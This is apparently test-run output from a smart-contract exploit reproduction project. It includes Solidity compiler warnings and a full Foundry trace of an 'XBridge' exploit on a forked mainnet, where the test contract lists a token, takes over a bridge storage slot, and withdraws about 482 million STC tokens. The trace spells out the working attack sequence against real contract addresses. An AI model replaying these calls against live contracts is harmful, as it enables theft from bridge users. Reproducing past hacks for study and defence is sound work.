Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.24s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.86s (17.11ms CPU time)

Ran 1 test for src/test/2024-04/XBridge_exp.sol:ContractTest
[PASS] testExploit() (gas: 263632)
Logs:
  Exploiter STC balance before attack: 0.000000000
  Exploiter STC balance after attack: 482589886.903032631

Traces:
  [3649] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 19723700 [1.972e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [271232] ContractTest::testExploit()
    ├─ [0] VM::deal(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 150000000000000000 [1.5e17])
    │   └─ ← [Return]
    ├─ [20044] 0x19Ae49B9F38dD836317363839A5f6bfBFA7e319A::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "Exploiter STC balance before attack", val: 0, decimals: 9)
    ├─ [138047] 0x47Ddb6A433B76117a98FBeAb5320D8b67D468e31::listToken{value: 150000000000000000}(tokenInfo({ token: 0x19Ae49B9F38dD836317363839A5f6bfBFA7e319A, chain: 85936 [8.593e4] }), tokenInfo({ token: 0x19Ae49B9F38dD836317363839A5f6bfBFA7e319A, chain: 95838 [9.583e4] }), false)
    │   ├─ [130785] 0x354CCA2F55ddE182d36fE34D673430E226a3cB8C::listToken{value: 150000000000000000}(tokenInfo({ token: 0x19Ae49B9F38dD836317363839A5f6bfBFA7e319A, chain: 85936 [8.593e4] }), tokenInfo({ token: 0x19Ae49B9F38dD836317363839A5f6bfBFA7e319A, chain: 95838 [9.583e4] }), false) [delegatecall]
    │   │   ├─ [0] 0x579ed0e3996e192Fcd64d85daEF7F985566DdE3E::fallback{value: 150000000000000000}()
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit TokenListed(param0: 0x19Ae49B9F38dD836317363839A5f6bfBFA7e319A, param1: 85936 [8.593e4], param2: 0x19Ae49B9F38dD836317363839A5f6bfBFA7e319A, param3: 95838 [9.583e4], param4: false, param5: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb98092798d24e50ac842a2bad69d7c585ab2d2b62b68eed0b9188eac440c5b23: 0 → 0x00000000000000000000000019ae49b9f38dd836317363839a5f6bfbfa7e319a
    │   │   │   @ 0xf1867c6902cb8db3e11315b450a98919b099e646e1104d373b45217b05918d57: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0x3266726d19f59856c944b4b0e637c2eff82474c7ecc12a1a3fdee91c1a2f0550: 0x000000000000000000000000fe6bb1654227fa21b8a65a6a89f6489fc3cc2fcd → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0x30374f0546acc9c3ca7df42e0dac5098193b58e95d89d0517f2bd368594586a2: 0 → 0x00000000000000000000000019ae49b9f38dd836317363839a5f6bfbfa7e319a
    │   │   │   @ 0x975e4284ef97a1fabdfee06aa309ae3cf8d4cf547833b1a3cc6d080f5d40228f: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [8044] 0x19Ae49B9F38dD836317363839A5f6bfBFA7e319A::balanceOf(0x47Ddb6A433B76117a98FBeAb5320D8b67D468e31) [staticcall]
    │   └─ ← [Return] 482589886903032631 [4.825e17]
    ├─ [70580] 0x47Ddb6A433B76117a98FBeAb5320D8b67D468e31::withdrawTokens(0x19Ae49B9F38dD836317363839A5f6bfBFA7e319A, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 482589886903032631 [4.825e17])
    │   ├─ [69830] 0x354CCA2F55ddE182d36fE34D673430E226a3cB8C::withdrawTokens(0x19Ae49B9F38dD836317363839A5f6bfBFA7e319A, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 482589886903032631 [4.825e17]) [delegatecall]
    │   │   ├─ [4044] 0x19Ae49B9F38dD836317363839A5f6bfBFA7e319A::balanceOf(0x47Ddb6A433B76117a98FBeAb5320D8b67D468e31) [staticcall]
    │   │   │   └─ ← [Return] 482589886903032631 [4.825e17]
    │   │   ├─ [55157] 0x19Ae49B9F38dD836317363839A5f6bfBFA7e319A::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 482589886903032631 [4.825e17])
    │   │   │   ├─ emit Transfer(from: 0x47Ddb6A433B76117a98FBeAb5320D8b67D468e31, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 482589886903032631 [4.825e17])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb40023af99242e3d5ec1f559d21dafa6d3cf16aec254ed242480f4a77944580c: 0x013c4525d0f84acf751993535a234b2a53a7066930a375b1e2be00b7df8e4566 → 0
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x013c4525d0f84acf751993535a234b2a53a7066930a375b1e2be00b7df8e4566
    │   │   │   │   @ 0xbdfeb5a4844e9b911d8168b41d6411f920db84b51cd63540743043e73f857705: 0x00000000000000000000000000000000000000000000000000000000662820e3 → 0x000000000000000000000000000000000000000000000000000000006628b23f
    │   │   │   └─ ← [Return] true
    │   │   ├─ emit TokenWithdrawn(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 482589886903032631 [4.825e17])
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [4044] 0x19Ae49B9F38dD836317363839A5f6bfBFA7e319A::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 482589886903032631 [4.825e17]
    ├─ emit log_named_decimal_uint(key: "Exploiter STC balance after attack", val: 482589886903032631 [4.825e17], decimals: 9)
    ├─  storage changes:
    │   @ 101: 2 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 12.92s (10.96s CPU time)

Ran 2 test suites in 17.67s (14.78s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
